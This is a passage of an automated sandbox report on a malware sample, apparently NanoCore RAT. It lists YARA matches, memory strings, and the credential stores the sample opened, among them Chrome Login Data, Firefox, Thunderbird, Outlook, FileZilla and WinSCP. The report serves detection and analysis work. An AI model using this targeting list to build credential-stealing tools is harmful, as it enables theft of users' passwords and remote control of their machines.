                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\TM57812337.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.Qjarsxlh.exe.3b87b90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.Qjarsxlh.exe.4417b90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.Qjarsxlh.exe.3b87b90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TM57812337.exe.3637b90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.Qjarsxlh.exe.4417b90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TM57812337.exe.3637b90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.507868874.0000000002B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.357836430.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.490555002.0000000004417000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.490354545.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.356252720.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.479060182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.509482353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.508036499.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.356883933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.479438317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.360421539.0000000003637000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.489012669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.504053128.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.508115512.0000000003B87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.489735823.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.506069217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.503266218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.479787922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.535329711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.504860007.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.478666137.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.360358801.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.355643671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.534538183.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.537338429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TM57812337.exe PID: 6460, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qjarsxlh.exe PID: 3216, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qjarsxlh.exe PID: 1300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6404, type: MEMORYSTR
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.537338429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6404, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.Qjarsxlh.exe.3b87b90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.Qjarsxlh.exe.4417b90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.Qjarsxlh.exe.3b87b90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TM57812337.exe.3637b90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.Qjarsxlh.exe.4417b90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TM57812337.exe.3637b90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.507868874.0000000002B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.357836430.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.490555002.0000000004417000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.490354545.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.356252720.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.479060182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.509482353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.508036499.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.356883933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.479438317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.360421539.0000000003637000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.489012669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.504053128.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.508115512.0000000003B87000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.489735823.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.506069217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.503266218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.479787922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.535329711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.504860007.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.478666137.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.360358801.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.355643671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.534538183.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.534481015.0000000002E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.537338429.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TM57812337.exe PID: 6460, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3700, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qjarsxlh.exe PID: 3216, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qjarsxlh.exe PID: 1300, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6404, type: MEMORYSTR
                Source: Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: InstallUtil.exe, 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: InstallUtil.exe, 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                Source: InstallUtil.exe, 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: InstallUtil.exe, 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                Source: InstallUtil.exe, 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: InstallUtil.exe, 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                Source: InstallUtil.exe, 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPE
